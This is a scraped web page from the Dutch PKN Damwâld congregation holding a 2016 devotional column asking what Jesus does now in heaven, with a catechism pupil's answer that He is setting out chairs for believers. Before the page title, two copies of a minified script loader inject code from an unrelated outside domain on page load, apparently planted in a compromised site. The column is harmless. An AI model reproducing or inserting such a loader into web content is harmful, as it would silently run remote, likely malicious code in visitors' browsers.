;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wat zou Jezus nu doen? - PKN Damwâld

Wat zou Jezus nu doen?

Gepubliceerd op: vrijdag 30 september 2016

Het is al bijna 2000 jaar geleden dat Jezus terugging naar Zijn Vader in de hemel.
Met onze eenvoudige mensengedachten vragen wij ons wel eens af, wat zouden God en Jezus nu doen. Dat God de aarde heeft geschapen en nog steeds bestuurt, is voor Christenen een uitgangspunt waaraan wij niet kunnen en willen tornen. Hoe God de wereld heeft geschapen en hoe Hij de wereld nog steeds bestuurt is voor ons mensen niet voor te stellen; en dat is ook helemaal niet nodig.
Dat Hij met het besturen van de aarde nog steeds bezig is geloven wij, al is menselijke twijfel  ons soms niet vreemd.
Maar Jezus, wat doet Hij ? Zijn werk op deze aarde is volbracht en welke taken Hij in de hemel verricht is ons niet bekend. Wij kunnen erover gissen, maar steeds komen we tot de conclusie dat het gissen blijft, wij kunnen Gods en Jezus’ wegen niet volgen.
Later, wanneer wij bij God zijn, zullen wij dat misschien weten; Want dat er vele mensen bij God zullen aankomen is zeker.  Jezus zegt immers zelf dat in het huis van Zijn Vader vele woningen zijn en dat Jezus zelf bezig is ons plaats te bereiden.
Eén van de catechisanten van de bijzondere catechisatie verwoordde Jezus uitspraak over het plaats bereiden wel heel letterlijk toen hij antwoordde op de vraag wat Jezus nu doet: ‘Hij zet de stoelen voor ons klaar, zodat wij kunnen zitten als we bij Hem aankomen’. Zullen wij ons daar aan  vast houden, Jezus zet de stoelen alvast voor u en mij klaar.
Dat te geloven geeft heel veel moed voor de toekomst.

Columnist:

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns